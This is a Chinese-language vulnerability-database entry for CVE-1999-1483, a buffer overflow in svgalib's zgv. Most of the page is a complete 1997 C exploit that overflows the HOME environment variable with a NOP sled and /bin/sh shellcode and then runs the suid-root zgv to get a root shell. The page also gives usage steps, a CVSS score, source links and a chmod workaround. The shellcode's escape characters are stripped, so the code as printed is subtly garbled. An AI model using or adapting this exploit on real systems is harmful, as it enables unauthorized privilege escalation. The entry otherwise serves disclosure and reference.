svgalib zgv缓冲区溢出漏洞

svgalib zgv缓冲区溢出漏洞

漏洞ID 1105314 漏洞类型 缓冲区溢出
发布时间 1997-06-20 更新时间 1997-06-20
图片[1]-svgalib zgv缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-1483
图片[2]-svgalib zgv缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199706-011
漏洞平台 Linux CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/339
https://www.securityfocus.com/bid/83027
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199706-011
|漏洞详情
svgalib1.2.10和早期版本中的zgv存在缓冲区溢出漏洞。本地用户可以借助长HOME环境变量执行任意代码。
|漏洞EXP
/*
 *
 * zgv exploit coded by BeastMaster V on June 20, 1997
 *
 * USAGE:
 *   For some strage reason, the filename length of this
 *   particular exploit must me one character long, otherwise you
 *   will be drop into a normal unpriviledged shell. Go Figure....
 *
 *   $ cp zgv_exploit.c n.c
 *   $ cc -o n n.c
 *   $ ./n
 *   Oak driver: Unknown chipset (id =  0)
 *   bash#
 *
 * EXPLANATION: zgv (suid root) does not check bounds for $HOME env.
 * TEMPORARY FIX:  chmod u-s /usr/bin/zgv
 * NOTE: Don't forget to visit http://www.rootshell.com for more exploits.
 * DISCLAIMER: Please use this in a responsible manner.
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shellcode =
  "x31xc0xb0x31xcdx80x93x31xc0xb0x17xcdx80x68x59x58xffxe1"
  "xffxd4x31xc0x99x89xcfxb0x2ex40xaex75xfdx89x39x89x51x04"
  "x89xfbx40xaex75xfdx88x57xffxb0x0bxcdx80x31xc0x40x31xdb"
  "xcdx80/"
  "/bin/sh"
  "0";

char *get_sp() {
   asm("movl %esp,%eax");
}

#define bufsize 4096
char buffer[bufsize];

main() {
  int i;

  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() -4675;

  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;

  setenv("HOME", buffer, 1);

  execl("/usr/bin/zgv", "/usr/bin/zgv", NULL);
}

// milw0rm.com [1997-06-20]
|受影响的产品
Svgalib Svgalib 1.2.10
|参考资料

来源:BUGTRAQ
名称:19970619svgalib/zgv
链接:http://www.securityfocus.com/archive/1/7041

相关推荐: NFS cache中毒漏洞

NFS cache中毒漏洞 漏洞ID 1207557 漏洞类型 未知 发布时间 1997-03-01 更新时间 1997-03-01 CVE编号 CVE-1999-0165 CNNVD-ID CNNVD-199703-005 漏洞平台 N/A CVSS评分 1…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享